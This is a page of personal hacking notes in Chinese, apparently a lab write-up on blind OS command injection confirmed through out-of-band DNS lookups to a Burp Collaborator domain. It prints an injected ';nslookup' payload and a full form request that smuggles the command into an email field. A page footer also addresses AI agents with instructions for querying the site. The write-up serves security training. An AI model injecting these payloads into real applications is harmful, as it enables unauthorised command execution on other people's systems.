> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/zh/web/command-injection/blind-command-injection-with-oob-interaction.md).

# 通过 OOB 交互的盲命令注入

### 带外交互的盲目 OS 命令注入

本实验展示了反馈功能存在盲目系统命令注入漏洞。/ 该应用程序执行一个由用户提供的数据构建的 shell 命令。此执行是 **异步的** 并且不会影响应用程序返回的响应。无法将命令输出重定向到可访问的位置。另一方面，可以导致 **带外交互（OOB）** 到外部域名。

本实验的目标是利用该注入迫使应用程序向 Burp Collaborator 域名发起一次 \*\* DNS\*\* 请求。

#### **方法**

`nslookup` 用于生成出站查询。/ 注入是在表单的某个字段中完成的，通过在订单周围包裹 `;` 以破坏原始语法。

已测试命令示例：

```
nslookup
```

注入的负载：

<pre><code><strong>;nslookup IP;
</strong></code></pre>

如果注入成功，我们会在 Burp Collaborator 上收到该请求。

#### **完整请求示例**

{% code overflow="wrap" %}

```bash
csrf=2GdzmbhNzU7HHOj8pOZUwUfJ1s0EIbjP&name=test&email=test%40test.com.com;nslookup v51x9gtodb5n35252oddaichm8szgq4f.oastify.com;&subject=test&message=test.com
```

{% endcode %}

此负载会触发向受控域名发起 DNS 请求，从而确认带外盲注入。

<figure><img src="/files/459fc107c4d1f50f4925416a2bb7f9c282162cef" alt=""><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/zh/web/command-injection/blind-command-injection-with-oob-interaction.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
